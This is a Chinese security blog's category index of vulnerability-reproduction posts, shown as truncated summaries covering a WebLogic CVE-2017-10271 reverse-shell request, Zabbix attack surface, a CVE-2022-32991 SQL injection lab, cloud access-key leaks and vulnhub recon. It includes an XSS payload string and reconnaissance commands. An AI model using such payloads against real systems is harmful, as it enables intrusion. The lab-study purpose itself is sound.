随笔分类 -  漏洞复现

web,windows系统,linux系统,软件漏洞
摘要:参考: https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2017-10271/README.md 反弹shellEXP: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 172.3 阅读全文
posted @ 2023-05-17 23:26 菜就多练forever 阅读(50) 评论(0) 推荐(0)
摘要:原文链接: https://www.anquanke.com//post/id/250722 Zabbix攻击面挖掘与利用 阅读量 **34618** | 一、简介 Zabbix是一个支持实时监控数千台服务器、虚拟机和网络设备的企业级解决方案,客户覆盖许多大型企业。本议题介绍了Zabbix基础架构、 阅读全文
posted @ 2023-05-17 00:03 菜就多练forever 阅读(270) 评论(0) 推荐(0)
摘要:题目 CVE-2022-32991 Web Based Quiz System SQL注入 该CMS的welcome.php中存在SQL注入攻击。 解题思路: 1.搜索题目给出cve编号信息 2.访问靶场环境: js中无提示信息,进行手工访问。注册登录,找到带eid参数的welcom.php请求的数 阅读全文
posted @ 2022-10-27 23:09 菜就多练forever 阅读(617) 评论(0) 推荐(0)
摘要:前言 项目中各厂商越来越趋势于使用云存储,云管理。 漏洞介绍 AK/SK(Access Key ID/Secret Access Key)即访问密钥,包含访问密钥ID(AK)和秘密访问密钥(SK)两部分,公有云通过AK识别用户的身份,通过SK对请求数据进行签名验证,用于确保请求的机密性、完整性和请求 阅读全文
posted @ 2022-10-19 09:24 菜就多练forever 阅读(4279) 评论(0) 推荐(0)
摘要:beanshell package cn.ecology; //通过maven导包;去beanshell官网下载假如lib import bsh.Interpreter; /*Interpreter * */ public class TestEval { public static void ma 阅读全文
posted @ 2022-06-13 23:41 菜就多练forever 阅读(570) 评论(0) 推荐(0)
摘要:vulhub4下载地址自己搜索。 信息搜集 扫描靶机ip,netdiscover -i eth0,找到靶机ip为192.168.136.140 root@w0rk:~# dirb http://192.168.79.132/ root@w0rk:~# searchsploit phpmail 获取w 阅读全文
posted @ 2021-01-07 16:43 菜就多练forever 阅读(451) 评论(0) 推荐(0)
摘要:我们使用 payload :?url=javascript://comment%250aalert(1) ,可以执行 alert 函数: 实际上,这里的 // 在JavaScript中表示单行注释,所以后面的内容均为注释,那为什么会执行 alert 函数呢?那是因为我们这里用了字符 %0a ,该字符 阅读全文
posted @ 2019-08-05 11:16 菜就多练forever 阅读(838) 评论(0) 推荐(0)
摘要:1SQL注入 注入:https://redtiger.labs.overthewire.org/ sqli lab 阅读全文
posted @ 2018-03-22 23:12 菜就多练forever 阅读(329) 评论(0) 推荐(0)
摘要:Struts2 阅读全文
posted @ 2017-12-28 22:20 菜就多练forever 阅读(1019) 评论(0) 推荐(0)